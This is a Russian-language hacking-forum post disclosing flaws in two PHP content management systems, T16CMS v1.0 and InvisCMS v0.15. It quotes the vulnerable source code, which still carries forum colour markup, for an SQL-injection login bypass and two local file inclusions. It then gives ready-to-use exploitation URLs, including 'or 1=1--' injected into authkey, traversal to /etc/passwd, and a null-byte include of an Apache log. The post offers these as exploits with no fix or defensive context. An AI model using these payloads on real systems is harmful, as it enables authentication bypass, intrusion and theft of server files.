02.07.2010, 01:08
|
|
Познающий
Регистрация: 21.02.2009
Сообщений: 54
С нами:
9061820
Репутация:
134
|
|
T16CMS v1.0
Download: http://code.google.com/p/t16cms/
SQL-иньекция{обход авторизации}(mq==off):
Уязвимый файл:
./t16cms/php/user.php
Код:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]get_reg[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$inp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]) {
global[/COLOR][COLOR="#0000BB"]$dbhost[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$dbname[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$dbuser[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$dbpasswd[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$dbprefix[/COLOR][COLOR="#007700"];
echo[/COLOR][COLOR="#0000BB"]$inp[/COLOR][COLOR="#007700"];
if ([/COLOR][COLOR="#0000BB"]$inp[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]){
if (@isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'authkey'[/COLOR][COLOR="#007700"]])){
[/COLOR][COLOR="#0000BB"]$_authkey[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'authkey'[/COLOR][COLOR="#007700"]];
if ([/COLOR][COLOR="#0000BB"]$_authkey[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]){
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'SELECT * FROM `_users` WHERE `authkey` = '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_authkey[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' LIMIT 1'[/COLOR][COLOR="#007700"];
echo[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]mysql_connect[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$dbhost[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$dbuser[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$dbpasswd[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'SET NAMES cp1251'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_db_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$dbname[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]);
while([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"])) {
if ([/COLOR][COLOR="#0000BB"]get_right[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'access'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'access'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])){
global[/COLOR][COLOR="#0000BB"]$site_user[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$site_user[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];
}else{echo[/COLOR][COLOR="#DD0000"]"Вы видимо не активированный"[/COLOR][COLOR="#007700"];}[/COLOR][COLOR="#FF8000"]//уголь
[/COLOR][COLOR="#007700"]};
[/COLOR][COLOR="#0000BB"]mysql_free_result[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]);
}}
}else {
...[/COLOR][/COLOR]
LFI(авторизация):
Уязвимый файл:
./t16cms/cp/index.php
Код:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'module'[/COLOR][COLOR="#007700"]])){
[/COLOR][COLOR="#0000BB"]$default[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'module'[/COLOR][COLOR="#007700"]];
...
[/COLOR][COLOR="#0000BB"]$default[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"modules/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$default[/COLOR][COLOR="#007700"];
...
if ([/COLOR][COLOR="#0000BB"]get_reg[/COLOR][COLOR="#007700"]()==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]) {[/COLOR][COLOR="#FF8000"]//авторизация, код выше
[/COLOR][COLOR="#007700"]...
include[/COLOR][COLOR="#0000BB"]$default[/COLOR][COLOR="#007700"];
[/COLOR][/COLOR]
Эксплуатация(обе):
./t16cms/cp/index.php?authkey=1'+or+1=1--+&module=../../../../etc/passwd
InvisCMS v0.15
Download: http://code.google.com/p/inviscms/
LFI(mq==off):
Уязвимый файл:
./dx.php
Код:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
switch ([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'x'[/COLOR][COLOR="#007700"]):
...
case[/COLOR][COLOR="#DD0000"]'0x21'[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#0000BB"]$d[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#FF8000"]#die_r($_GET);
[/COLOR][COLOR="#007700"]if(isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'frm_name'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'frm_name'[/COLOR][COLOR="#007700"]]!=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]&& isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'result'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'result'[/COLOR][COLOR="#007700"]]!=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$brain[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'path_to_site'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]'/lib/core/others/forms/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'frm_name'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]'.inc'[/COLOR][COLOR="#007700"];
if([/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$brain[/COLOR][COLOR="#007700"]))
{
@include([/COLOR][COLOR="#0000BB"]$brain[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#FF8000"]#die(stripslashes($_GET['result']));
[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$jsondecoder[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]decode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]stripslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'result'[/COLOR][COLOR="#007700"]]));
[/COLOR][COLOR="#0000BB"]$d[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]call_user_func[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'frm_name'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]'_main'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]]);
}else{
[/COLOR][COLOR="#0000BB"]$d[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
}
}
print[/COLOR][COLOR="#0000BB"]$jsonencoder[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]encode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$d[/COLOR][COLOR="#007700"]);
break;
[/COLOR][/COLOR]
Эксплуатация:
./dx.php?x=33&frm_name=../../../../../../apache/log%00&result=33серебреника
|
|
|